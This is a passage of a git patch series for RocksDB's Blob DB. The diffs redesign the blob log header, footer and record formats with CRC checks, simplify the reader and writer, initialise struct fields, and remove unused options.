mismatch"); } - - if (has_ts) { - PutFixed64(dst, ts_guess_.get()->first); - PutFixed64(dst, ts_guess_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); - } -} - -Status BlobLogHeader::DecodeFrom(const Slice& input) { - Slice slice(input); - if (!GetFixed32(&slice, &magic_number_) || magic_number_ != kMagicNumber) { - return Status::Corruption("Invalid Blob Log Header: magic"); - } - - // as of today, we only support 1 version - if (!GetFixed32(&slice, &version_) || version_ != kVersion1) { - return Status::Corruption("Invalid Blob Log Header: version"); - } - - uint32_t val; - if (!GetFixed32(&slice, &val)) { - return Status::Corruption("Invalid Blob Log Header: subtype"); - } - - bool has_ttl = false; - bool has_ts = false; - RecordSubType st = static_cast(val & 0xff); - compression_ = static_cast((val >> 8) & 0xff); - switch (st) { - case kRegularType: - break; - case kTTLType: - has_ttl = true; - break; - case kTimestampType: - has_ts = true; - break; - default: - return Status::Corruption("Invalid Blob Log Header: subtype_2"); - } - - ttlrange_t temp_ttl; - if (!GetFixed64(&slice, &temp_ttl.first) || - !GetFixed64(&slice, &temp_ttl.second)) { - return Status::Corruption("Invalid Blob Log Header: ttl"); - } - if (has_ttl) { - set_ttl_guess(temp_ttl); - } - - tsrange_t temp_ts; - if (!GetFixed64(&slice, &temp_ts.first) || - !GetFixed64(&slice, &temp_ts.second)) { - return Status::Corruption("Invalid Blob Log Header: timestamp"); - } - if (has_ts) set_ts_guess(temp_ts); - return Status::OK(); } -BlobLogRecord::BlobLogRecord() - : checksum_(0), - header_cksum_(0), - key_size_(0), - blob_size_(0), - time_val_(0), - ttl_val_(0), - type_(0), - subtype_(0) {} - -BlobLogRecord::~BlobLogRecord() {} - -void BlobLogRecord::ResizeKeyBuffer(size_t kbs) { - if (kbs > key_buffer_.size()) { - key_buffer_.resize(kbs); - } -} - -void BlobLogRecord::ResizeBlobBuffer(size_t bbs) { - if (bbs > blob_buffer_.size()) { - blob_buffer_.resize(bbs); - } -} - -void BlobLogRecord::Clear() { - checksum_ = 0; - header_cksum_ = 0; - key_size_ = 0; - blob_size_ = 0; - time_val_ = 0; - ttl_val_ = 0; - type_ = subtype_ = 0; - key_.clear(); - blob_.clear(); +void BlobLogRecord::EncodeHeaderTo(std::string* dst) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(BlobLogRecord::kHeaderSize + key.size() + value.size()); + PutFixed64(dst, key.size()); + PutFixed64(dst, value.size()); + PutFixed64(dst, expiration); + header_crc = crc32c::Value(dst->c_str(), dst->size()); + header_crc = crc32c::Mask(header_crc); + PutFixed32(dst, header_crc); + blob_crc = crc32c::Value(key.data(), key.size()); + blob_crc = crc32c::Extend(blob_crc, value.data(), value.size()); + blob_crc = crc32c::Mask(blob_crc); + PutFixed32(dst, blob_crc); } -Status BlobLogRecord::DecodeHeaderFrom(const Slice& hdrslice) { - Slice input = hdrslice; - if (input.size() < kHeaderSize) { - return Status::Corruption("Invalid Blob Record Header: size"); +Status BlobLogRecord::DecodeHeaderFrom(Slice src) { + static const std::string kErrorMessage = "Error while decoding blob record"; + if (src.size() != BlobLogRecord::kHeaderSize) { + return Status::Corruption(kErrorMessage, + "Unexpected blob record header size"); } - - if (!GetFixed32(&input, &key_size_)) { - return Status::Corruption("Invalid Blob Record Header: key_size"); - } - if (!GetFixed64(&input, &blob_size_)) { - return Status::Corruption("Invalid Blob Record Header: blob_size"); + uint32_t src_crc = 0; + src_crc = crc32c::Value(src.data(), BlobLogRecord::kHeaderSize - 8); + src_crc = crc32c::Mask(src_crc); + if (!GetFixed64(&src, &key_size) || !GetFixed64(&src, &value_size) || + !GetFixed64(&src, &expiration) || !GetFixed32(&src, &header_crc) || + !GetFixed32(&src, &blob_crc)) { + return Status::Corruption(kErrorMessage, "Error decoding content"); } - if (!GetFixed64(&input, &ttl_val_)) { - return Status::Corruption("Invalid Blob Record Header: ttl_val"); + if (src_crc != header_crc) { + return Status::Corruption(kErrorMessage, "Header CRC mismatch"); } - if (!GetFixed64(&input, &time_val_)) { - return Status::Corruption("Invalid Blob Record Header: time_val"); - } - - type_ = *(input.data()); - input.remove_prefix(1); - subtype_ = *(input.data()); - input.remove_prefix(1); + return Status::OK(); +} - if (!GetFixed32(&input, &header_cksum_)) { - return Status::Corruption("Invalid Blob Record Header: header_cksum"); +Status BlobLogRecord::CheckBlobCRC() const { + uint32_t expected_crc = 0; + expected_crc = crc32c::Value(key.data(), key.size()); + expected_crc = crc32c::Extend(expected_crc, value.data(), value.size()); + expected_crc = crc32c::Mask(expected_crc); + if (expected_crc != blob_crc) { + return Status::Corruption("Blob CRC mismatch"); } - if (!GetFixed32(&input, &checksum_)) { - return Status::Corruption("Invalid Blob Record Header: checksum"); - } - return Status::OK(); } diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index c5b96d1b07a..1e056aa50a9 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -9,243 +9,113 @@ #ifndef ROCKSDB_LITE -#include -#include #include -#include -#include #include #include "rocksdb/options.h" +#include "rocksdb/slice.h" #include "rocksdb/status.h" #include "rocksdb/types.h" namespace rocksdb { - namespace blob_db { -class BlobFile; -class BlobDBImpl; +constexpr uint32_t kMagicNumber = 2395959; // 0x00248f37 +constexpr uint32_t kVersion1 = 1; constexpr uint64_t kNoExpiration = std::numeric_limits::max(); -enum RecordType : uint8_t { - // Zero is reserved for preallocated files - kFullType = 0, - - // For fragments - kFirstType = 1, - kMiddleType = 2, - kLastType = 3, - kMaxRecordType = kLastType -}; - -enum RecordSubType : uint8_t { - kRegularType = 0, - kTTLType = 1, - kTimestampType = 2, -}; - -extern const uint32_t kMagicNumber; - -class Reader; - -using ttlrange_t = std::pair; -using tsrange_t = std::pair; -using snrange_t = std::pair; - -class BlobLogHeader { - friend class BlobFile; - friend class BlobDBImpl; - - private: - uint32_t magic_number_ = 0; - uint32_t version_ = 1; - CompressionType compression_; - std::unique_ptr ttl_guess_; - std::unique_ptr ts_guess_; - - private: - void set_ttl_guess(const ttlrange_t& ttl) { - ttl_guess_.reset(new ttlrange_t(ttl)); - } - - void set_version(uint32_t v) { version_ = v; } - - void set_ts_guess(const tsrange_t& ts) { ts_guess_.reset(new tsrange_t(ts)); } - - public: - // magic number + version + flags + ttl guess + timestamp range = 44 - static const size_t kHeaderSize = 4 + 4 + 4 + 8 * 2 + 8 * 2; - - void EncodeTo(std::string* dst) const; - - Status DecodeFrom(const Slice& input); - - BlobLogHeader(); +using ExpirationRange = std::pair; +using SequenceRange = std::pair; - uint32_t magic_number() const { return magic_number_; } - - uint32_t version() const { return version_; } - - CompressionType compression() const { return compression_; } - - ttlrange_t ttl_range() const { - if (!ttl_guess_) { - return {0, 0}; - } - return *ttl_guess_; - } - - tsrange_t ts_range() const { - if (!ts_guess_) { - return {0, 0}; - } - return *ts_guess_; - } +// Format of blob log file header (30 bytes): +// +// +--------------+---------+---------+-------+-------------+-------------------+ +// | magic number | version | cf id | flags | compression | expiration range | +// +--------------+---------+---------+-------+-------------+-------------------+ +// | Fixed32 | Fixed32 | Fixed32 | char | char | Fixed64 Fixed64 | +// +--------------+---------+---------+-------+-------------+-------------------+ +// +// List of flags: +// has_ttl: Whether the file contain TTL data. +// +// Expiration range in the header is a rough range based on +// blob_db_options.ttl_range_secs. +struct BlobLogHeader { + static constexpr size_t kSize = 30; - bool HasTTL() const { return ttl_guess_ != nullptr; } + uint32_t version = kVersion1; + uint32_t column_family_id; + CompressionType compression; + bool has_ttl; + ExpirationRange expiration_range; - bool HasTimestamp() const { return ts_guess_ != nullptr; } + void EncodeTo(std::string* dst); - BlobLogHeader& operator=(BlobLogHeader&& in) noexcept; + Status DecodeFrom(Slice slice); }; -// Footer encapsulates the fixed information stored at the tail -// end of every blob log file. -class BlobLogFooter { - friend class BlobFile; - - public: - // Use this constructor when you plan to write out the footer using - // EncodeTo(). Never use this constructor with DecodeFrom(). - BlobLogFooter(); - - uint32_t magic_number() const { return magic_number_; } - - void EncodeTo(std::string* dst) const; - - Status DecodeFrom(const Slice& input); - - // convert this object to a human readable form - std::string ToString() const; - - // footer size = 4 byte magic number - // 8 bytes count - // 8, 8 - ttl range - // 8, 8 - sn range - // 8, 8 - ts range - // = 64 - static const size_t kFooterSize = 4 + 4 + 8 + (8 * 2) + (8 * 2) + (8 * 2); - - bool HasTTL() const { return !!ttl_range_; } - - bool HasTimestamp() const { return !!ts_range_; } - - uint64_t GetBlobCount() const { return blob_count_; } - - ttlrange_t GetTTLRange() const { - if (ttl_range_) { - *ttl_range_; - } - return {0, 0}; - } - - tsrange_t GetTimeRange() const { - if (ts_range_) { - return *ts_range_; - } - return {0, 0}; - } - - const snrange_t& GetSNRange() const { return sn_range_; } +// Format of blob log file footer (48 bytes): +// +// +--------------+------------+-------------------+-------------------+------------+ +// | magic number | blob count | expiration range | sequence range | footer CRC | +// +--------------+------------+-------------------+-------------------+------------+ +// | Fixed32 | Fixed64 | Fixed64 + Fixed64 | Fixed64 + Fixed64 | Fixed32 | +// +--------------+------------+-------------------+-------------------+------------+ +// +// The footer will be presented only when the blob file is properly closed. +// +// Unlike the same field in file header, expiration range in the footer is the +// range of smallest and largest expiration of the data in this file. +struct BlobLogFooter { + static constexpr size_t kSize = 48; - private: - uint32_t magic_number_ = 0; - uint64_t blob_count_ = 0; + uint64_t blob_count; + ExpirationRange expiration_range; + SequenceRange sequence_range; + uint32_t crc; - std::unique_ptr ttl_range_; - std::unique_ptr ts_range_; - snrange_t sn_range_; + void EncodeTo(std::string* dst); - private: - void set_ttl_range(const ttlrange_t& ttl) { - ttl_range_.reset(new ttlrange_t(ttl)); - } - void set_time_range(const tsrange_t& ts) { - ts_range_.reset(new tsrange_t(ts)); - } + Status DecodeFrom(Slice slice); }; -extern const size_t kBlockSize; - -class BlobLogRecord { - friend class Reader; - - private: - // this might not be set. - uint32_t checksum_; - uint32_t header_cksum_; - uint32_t key_size_; - uint64_t blob_size_; - uint64_t time_val_; - uint64_t ttl_val_; - char type_; - char subtype_; - Slice key_; - Slice blob_; - std::string key_buffer_; - std::string blob_buffer_; - - private: - void Clear(); - - char* GetKeyBuffer() { return &(key_buffer_[0]); } - - char* GetBlobBuffer() { return &(blob_buffer_[0]); } - - void ResizeKeyBuffer(size_t kbs); - - void ResizeBlobBuffer(size_t bbs); - - public: - // Header is - // Key Length ( 4 bytes ), - // Blob Length ( 8 bytes), - // ttl (8 bytes), timestamp (8 bytes), - // type (1 byte), subtype (1 byte) - // header checksum (4 bytes), blob checksum (4 bytes), - // = 42 - static const size_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1; - - public: - BlobLogRecord(); - - ~BlobLogRecord(); - - const Slice& Key() const { return key_; } - - const Slice& Blob() const { return blob_; } - - uint32_t GetKeySize() const { return key_size_; } - - uint64_t GetBlobSize() const { return blob_size_; } - - bool HasTTL() const { - return ttl_val_ != std::numeric_limits::max(); - } - - uint64_t GetTTL() const { return ttl_val_; } - - uint64_t GetTimeVal() const { return time_val_; } - - char type() const { return type_; } - - char subtype() const { return subtype_; } - - uint32_t header_checksum() const { return header_cksum_; } - - uint32_t checksum() const { return checksum_; } - - Status DecodeHeaderFrom(const Slice& hdrslice); +// Blob record format (32 bytes header + key + value): +// +// +------------+--------------+------------+------------+----------+---------+-----------+ +// | key length | value length | expiration | header CRC | blob CRC | key | value | +// +------------+--------------+------------+------------+----------+---------+-----------+ +// | Fixed64 | Fixed64 | Fixed64 | Fixed32 | Fixed32 | key len | value len | +// +------------+--------------+------------+------------+----------+---------+-----------+ +// +// If file has has_ttl = false, expiration field is always 0, and the blob +// doesn't has expiration. +// +// Also note that if compression is used, value is compressed value and value +// length is compressed value length. +// +// Header CRC is the checksum of (key_len + val_len + expiration), while +// blob CRC is the checksum of (key + value). +// +// We could use variable length encoding (Varint64) to save more space, but it +// make reader more complicated. +struct BlobLogRecord { + // header include fields up to blob CRC + static constexpr size_t kHeaderSize = 32; + + uint64_t key_size; + uint64_t value_size; + uint64_t expiration; + uint32_t header_crc; + uint32_t blob_crc; + Slice key; + Slice value; + std::string key_buf; + std::string value_buf; + + void EncodeHeaderTo(std::string* dst); + + Status DecodeHeaderFrom(Slice src); + + Status CheckBlobCRC() const; }; } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 826551d686e..a2421b93007 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -7,10 +7,8 @@ #include "utilities/blob_db/blob_log_reader.h" -#include -#include "rocksdb/env.h" -#include "util/coding.h" -#include "util/crc32c.h" +#include + #include "util/file_reader_writer.h" namespace rocksdb { @@ -18,115 +16,79 @@ namespace blob_db { Reader::Reader(std::shared_ptr info_log, unique_ptr&& _file) - : info_log_(info_log), file_(std::move(_file)), buffer_(), next_byte_(0) { - backing_store_.resize(kBlockSize); + : info_log_(info_log), file_(std::move(_file)), buffer_(), next_byte_(0) {} + +Status Reader::ReadSlice(uint64_t size, Slice* slice, std::string* buf) { + buf->reserve(size); + Status s = file_->Read(size, slice, &(*buf)[0]); + next_byte_ += size; + if (!s.ok()) { + return s; + } + if (slice->size() != size) { + return Status::Corruption("EOF reached while reading record"); + } + return s; } -Reader::~Reader() {} - Status Reader::ReadHeader(BlobLogHeader* header) { assert(file_.get() != nullptr); assert(next_byte_ == 0); - Status status = - file_->Read(BlobLogHeader::kHeaderSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; + Status s = ReadSlice(BlobLogHeader::kSize, &buffer_, &backing_store_); + if (!s.ok()) { + return s; + } - if (buffer_.size() != BlobLogHeader::kHeaderSize) { - return Status::IOError("EOF reached before file header"); + if (buffer_.size() != BlobLogHeader::kSize) { + return Status::Corruption("EOF reached before file header"); } - status = header->DecodeFrom(buffer_); - return status; + return header->DecodeFrom(buffer_); } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, uint64_t* blob_offset) { - record->Clear(); - buffer_.clear(); - backing_store_[0] = '\0'; - - Status status = - file_->Read(BlobLogRecord::kHeaderSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; + Status s = ReadSlice(BlobLogRecord::kHeaderSize, &buffer_, &backing_store_); + if (!s.ok()) { + return s; + } if (buffer_.size() != BlobLogRecord::kHeaderSize) { - return Status::IOError("EOF reached before record header"); + return Status::Corruption("EOF reached before record header"); } - status = record->DecodeHeaderFrom(buffer_); - if (!status.ok()) { - return status; + s = record->DecodeHeaderFrom(buffer_); + if (!s.ok()) { + return s; } - uint32_t header_crc = 0; - uint32_t blob_crc = 0; - size_t crc_data_size = BlobLogRecord::kHeaderSize - 2 * sizeof(uint32_t); - header_crc = crc32c::Extend(header_crc, buffer_.data(), crc_data_size); - - uint64_t kb_size = record->GetKeySize() + record->GetBlobSize(); + uint64_t kb_size = record->key_size + record->value_size; if (blob_offset != nullptr) { - *blob_offset = next_byte_ + record->GetKeySize(); + *blob_offset = next_byte_ + record->key_size; } + switch (level) { case kReadHeader: - file_->Skip(kb_size); + file_->Skip(record->key_size + record->value_size); next_byte_ += kb_size; + break; case kReadHeaderKey: - record->ResizeKeyBuffer(record->GetKeySize()); - status = file_->Read(record->GetKeySize(), &record->key_, - record->GetKeyBuffer()); - next_byte_ += record->key_.size(); - if (!status.ok()) return status; - if (record->key_.size() != record->GetKeySize()) { - return Status::IOError("EOF reached before key read"); - } - - header_crc = - crc32c::Extend(header_crc, record->key_.data(), record->GetKeySize()); - header_crc = crc32c::Mask(header_crc); - if (header_crc != record->header_cksum_) { - return Status::Corruption("Record Checksum mismatch: header_cksum"); - } - - file_->Skip(record->GetBlobSize()); - next_byte_ += record->GetBlobSize(); + s = ReadSlice(record->key_size, &record->key, &record->key_buf); + file_->Skip(record->value_size); + next_byte_ += record->value_size; + break; case kReadHeaderKeyBlob: - record->ResizeKeyBuffer(record->GetKeySize()); - status = file_->Read(record->GetKeySize(), &record->key_, - record->GetKeyBuffer()); - next_byte_ += record->key_.size(); - if (!status.ok()) return status; - if (record->key_.size() != record->GetKeySize()) { - return Status::IOError("EOF reached before key read"); - } - - header_crc = - crc32c::Extend(header_crc, record->key_.data(), record->GetKeySize()); - header_crc = crc32c::Mask(header_crc); - if (header_crc != record->header_cksum_) { - return Status::Corruption("Record Checksum mismatch: header_cksum"); - } - - record->ResizeBlobBuffer(record->GetBlobSize()); - status = file_->Read(record->GetBlobSize(), &record->blob_, - record->GetBlobBuffer()); - next_byte_ += record->blob_.size(); - if (!status.ok()) return status; - if (record->blob_.size() != record->GetBlobSize()) { - return Status::IOError("EOF reached during blob read"); + s = ReadSlice(record->key_size, &record->key, &record->key_buf); + if (s.ok()) { + s = ReadSlice(record->value_size, &record->value, &record->value_buf); } - - blob_crc = - crc32c::Extend(blob_crc, record->blob_.data(), record->blob_.size()); - blob_crc = crc32c::Mask(blob_crc); - if (blob_crc != record->checksum_) { - return Status::Corruption("Blob Checksum mismatch"); + if (s.ok()) { + s = record->CheckBlobCRC(); } + break; } - return status; + return s; } } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index d37e10bc4e4..9c76b92aefe 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -7,11 +7,9 @@ #ifndef ROCKSDB_LITE -#include #include #include -#include "rocksdb/options.h" #include "rocksdb/slice.h" #include "rocksdb/status.h" #include "utilities/blob_db/blob_log_format.h" @@ -51,7 +49,11 @@ class Reader { Reader(std::shared_ptr info_log, std::unique_ptr&& file); - ~Reader(); + ~Reader() = default; + + // No copying allowed + Reader(const Reader&) = delete; + Reader& operator=(const Reader&) = delete; Status ReadHeader(BlobLogHeader* header); @@ -64,6 +66,8 @@ class Reader { Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHeader, uint64_t* blob_offset = nullptr); + Status ReadSlice(uint64_t size, Slice* slice, std::string* buf); + SequentialFileReader* file() { return file_.get(); } void ResetNextByte() { next_byte_ = 0; } @@ -72,9 +76,6 @@ class Reader { const SequentialFileReader* file_reader() const { return file_.get(); } - private: - char* GetReadBuffer() { return &(backing_store_[0]); } - private: std::shared_ptr info_log_; const std::unique_ptr file_; @@ -84,10 +85,6 @@ class Reader { // which byte to read next. For asserting proper usage uint64_t next_byte_; - - // No copying allowed - Reader(const Reader&) = delete; - Reader& operator=(const Reader&) = delete; }; } // namespace blob_db diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index f4fcaeb90f9..806ca3c959f 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -10,8 +10,8 @@ #include #include "rocksdb/env.h" #include "util/coding.h" -#include "util/crc32c.h" #include "util/file_reader_writer.h" +#include "utilities/blob_db/blob_log_format.h" namespace rocksdb { namespace blob_db { @@ -24,18 +24,11 @@ Writer::Writer(unique_ptr&& dest, uint64_t log_number, bytes_per_sync_(bpsync), next_sync_offset_(0), use_fsync_(use_fs), - last_elem_type_(kEtNone) { - for (int i = 0; i <= kMaxRecordType; i++) { - char t = static_cast(i); - type_crc_[i] = crc32c::Value(&t, 1); - } -} - -Writer::~Writer() {} + last_elem_type_(kEtNone) {} void Writer::Sync() { dest_->Sync(use_fsync_); } -Status Writer::WriteHeader(const BlobLogHeader& header) { +Status Writer::WriteHeader(BlobLogHeader& header) { assert(block_offset_ == 0); assert(last_elem_type_ == kEtNone); std::string str; @@ -50,7 +43,7 @@ Status Writer::WriteHeader(const BlobLogHeader& header) { return s; } -Status Writer::AppendFooter(const BlobLogFooter& footer) { +Status Writer::AppendFooter(BlobLogFooter& footer) { assert(block_offset_ != 0); assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); @@ -69,13 +62,13 @@ Status Writer::AppendFooter(const BlobLogFooter& footer) { } Status Writer::AddRecord(const Slice& key, const Slice& val, - uint64_t* key_offset, uint64_t* blob_offset, - uint64_t ttl) { + uint64_t expiration, uint64_t* key_offset, + uint64_t* blob_offset) { assert(block_offset_ != 0); assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; - ConstructBlobHeader(&buf, key, val, ttl, -1); + ConstructBlobHeader(&buf, key, val, expiration); Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset); return s; @@ -87,44 +80,19 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; - ConstructBlobHeader(&buf, key, val, -1, -1); + ConstructBlobHeader(&buf, key, val, 0); Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset); return s; } -void Writer::ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, uint64_t ttl, int64_t ts) { - headerbuf->reserve(BlobLogRecord::kHeaderSize); - - uint32_t key_size = static_cast(key.size()); - PutFixed32(headerbuf, key_size); - PutFixed64(headerbuf, val.size()); - - PutFixed64(headerbuf, ttl); - PutFixed64(headerbuf, ts); - - RecordType t = kFullType; - headerbuf->push_back(static_cast(t)); - - RecordSubType st = kRegularType; - if (ttl != kNoExpiration) { - st = kTTLType; - } - headerbuf->push_back(static_cast(st)); - - uint32_t header_crc = 0; - header_crc = - crc32c::Extend(header_crc, headerbuf->c_str(), headerbuf->size()); - header_crc = crc32c::Extend(header_crc, key.data(), key.size()); - header_crc = crc32c::Mask(header_crc); - PutFixed32(headerbuf, header_crc); - - uint32_t crc = 0; - // Compute the crc of the record type and the payload. - crc = crc32c::Extend(crc, val.data(), val.size()); - crc = crc32c::Mask(crc); // Adjust for storage - PutFixed32(headerbuf, crc); +void Writer::ConstructBlobHeader(std::string* buf, const Slice& key, + const Slice& val, uint64_t expiration) { + BlobLogRecord record; + record.key = key; + record.value = val; + record.expiration = expiration; + record.EncodeHeaderTo(buf); } Status Writer::EmitPhysicalRecord(const std::string& headerbuf, diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index d674351588b..2a1f05e1b34 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -37,24 +37,29 @@ class Writer { explicit Writer(std::unique_ptr&& dest, uint64_t log_number, uint64_t bpsync, bool use_fsync, uint64_t boffset = 0); - ~Writer(); - static void ConstructBlobHeader(std::string* headerbuf, const Slice& key, - const Slice& val, uint64_t ttl, int64_t ts); + ~Writer() = default; + + // No copying allowed + Writer(const Writer&) = delete; + Writer& operator=(const Writer&) = delete; + + static void ConstructBlobHeader(std::string* buf, const Slice& key, + const Slice& val, uint64_t expiration); Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); - Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, - uint64_t* blob_offset, uint64_t ttl); + Status AddRecord(const Slice& key, const Slice& val, uint64_t expiration, + uint64_t* key_offset, uint64_t* blob_offset); Status EmitPhysicalRecord(const std::string& headerbuf, const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); - Status AppendFooter(const BlobLogFooter& footer); + Status AppendFooter(BlobLogFooter& footer); - Status WriteHeader(const BlobLogHeader& header); + Status WriteHeader(BlobLogHeader& header); WritableFileWriter* file() { return dest_.get(); } @@ -76,15 +81,6 @@ class Writer { uint64_t next_sync_offset_; bool use_fsync_; - // crc32c values for all supported record types. These are - // pre-computed to reduce the overhead of computing the crc of the - // record type stored in the header. - uint32_t type_crc_[kMaxRecordType + 1]; - - // No copying allowed - Writer(const Writer&) = delete; - Writer& operator=(const Writer&) = delete; - public: enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFileFooter }; ElemType last_elem_type_; From ffc3c62ca2947203778a954259c9ffb9de1abd07 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Tue, 31 Oct 2017 16:27:22 -0700 Subject: [PATCH 180/205] Blob DB: Initialize all fields in Blob Header, Footer and Record structs Summary: Fixing un-itializations caught by valgrind. Closes https://github.com/facebook/rocksdb/pull/3103 Differential Revision: D6200195 Pulled By: sagar0 fbshipit-source-id: bf35a3fb03eb1d308e4c5ce30dee1e345d7b03b3 --- utilities/blob_db/blob_db_impl.cc | 5 +++++ utilities/blob_db/blob_log_format.h | 26 +++++++++++++------------- 2 files changed, 18 insertions(+), 13 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 701066f80ff..8f4b876842e 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -552,6 +552,8 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { bfile->file_size_ = BlobLogHeader::kSize; bfile->header_.compression = bdb_options_.compression; bfile->header_.has_ttl = false; + bfile->header_.column_family_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); bfile->header_valid_ = true; bfile->SetHasTTL(false); @@ -615,6 +617,9 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { bfile->header_.expiration_range = expiration_range; bfile->header_.compression = bdb_options_.compression; bfile->header_.has_ttl = true; + bfile->header_.column_family_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); + ; bfile->header_valid_ = true; bfile->SetHasTTL(true); bfile->file_size_ = BlobLogHeader::kSize; diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index 1e056aa50a9..0b5cff54797 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -43,10 +43,10 @@ struct BlobLogHeader { static constexpr size_t kSize = 30; uint32_t version = kVersion1; - uint32_t column_family_id; - CompressionType compression; - bool has_ttl; - ExpirationRange expiration_range; + uint32_t column_family_id = 0; + CompressionType compression = kNoCompression; + bool has_ttl = false; + ExpirationRange expiration_range = std::make_pair(0, 0); void EncodeTo(std::string* dst); @@ -68,10 +68,10 @@ struct BlobLogHeader { struct BlobLogFooter { static constexpr size_t kSize = 48; - uint64_t blob_count; - ExpirationRange expiration_range; - SequenceRange sequence_range; - uint32_t crc; + uint64_t blob_count = 0; + ExpirationRange expiration_range = std::make_pair(0, 0); + SequenceRange sequence_range = std::make_pair(0, 0); + uint32_t crc = 0; void EncodeTo(std::string* dst); @@ -101,11 +101,11 @@ struct BlobLogRecord { // header include fields up to blob CRC static constexpr size_t kHeaderSize = 32; - uint64_t key_size; - uint64_t value_size; - uint64_t expiration; - uint32_t header_crc; - uint32_t blob_crc; + uint64_t key_size = 0; + uint64_t value_size = 0; + uint64_t expiration = 0; + uint32_t header_crc = 0; + uint32_t blob_crc = 0; Slice key; Slice value; std::string key_buf; From c1e99eddc87b57d50a746ff042de28e7d8d96956 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 31 Oct 2017 16:33:55 -0700 Subject: [PATCH 181/205] Blob DB: cleanup unused options Summary: * cleanup num_concurrent_simple_blobs. We don't do concurrent writes (by taking write_mutex_) so it doesn't make sense to have multiple non TTL files open. We can revisit later when we want to improve writes. * cleanup eviction callback. we don't have plan to use it now. * rename s/open_simple_blob_files_/open_non_ttl_file_/ and s/open_blob_files_/open_ttl_files_/ to avoid confusion. Closes https://github.com/facebook/rocksdb/pull/3088 Differential Revision: D6182598 Pulled By: yiwu-arbug fbshipit-source-id: 99e6f5e01fa66d31309cdb06ce48502464bac6ad --- utilities/blob_db/blob_db.cc | 2 - utilities/blob_db/blob_db.h | 9 -- utilities/blob_db/blob_db_impl.cc | 163 ++++++++---------------------- utilities/blob_db/blob_db_impl.h | 17 +--- utilities/blob_db/blob_db_test.cc | 1 - 5 files changed, 45 insertions(+), 147 deletions(-) diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index 947840751e5..1fd9261417b 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -186,8 +186,6 @@ void BlobDBOptions::Dump(Logger* log) const { bytes_per_sync); ROCKS_LOG_HEADER(log, " blob_db_options.blob_file_size: %" PRIu64, blob_file_size); - ROCKS_LOG_HEADER(log, "blob_db_options.num_concurrent_simple_blobs: %" PRIu32, - num_concurrent_simple_blobs); ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", ttl_extractor.get()); ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 76ab95555a0..1ef382ab867 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -63,20 +63,11 @@ struct BlobDBOptions { // after it exceeds that size uint64_t blob_file_size = 256 * 1024 * 1024; - // how many files to use for simple blobs at one time - uint32_t num_concurrent_simple_blobs = 1; - // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil, // applications can set a TTLExtractor which can extract TTL from key-value // pairs. std::shared_ptr ttl_extractor = nullptr; - // eviction callback. - // this function will be called for every blob that is getting - // evicted. - std::function - gc_evict_cb_fn; - // what compression to use for Blob's CompressionType compression = kNoCompression; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 8f4b876842e..7c27be789d0 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -413,7 +413,7 @@ Status BlobDBImpl::OpenAllFiles() { expiration_range.second); } } else { - open_blob_files_.insert(bfptr); + open_ttl_files_.insert(bfptr); } } } @@ -493,23 +493,23 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { std::shared_ptr BlobDBImpl::FindBlobFileLocked( uint64_t expiration) const { - if (open_blob_files_.empty()) return 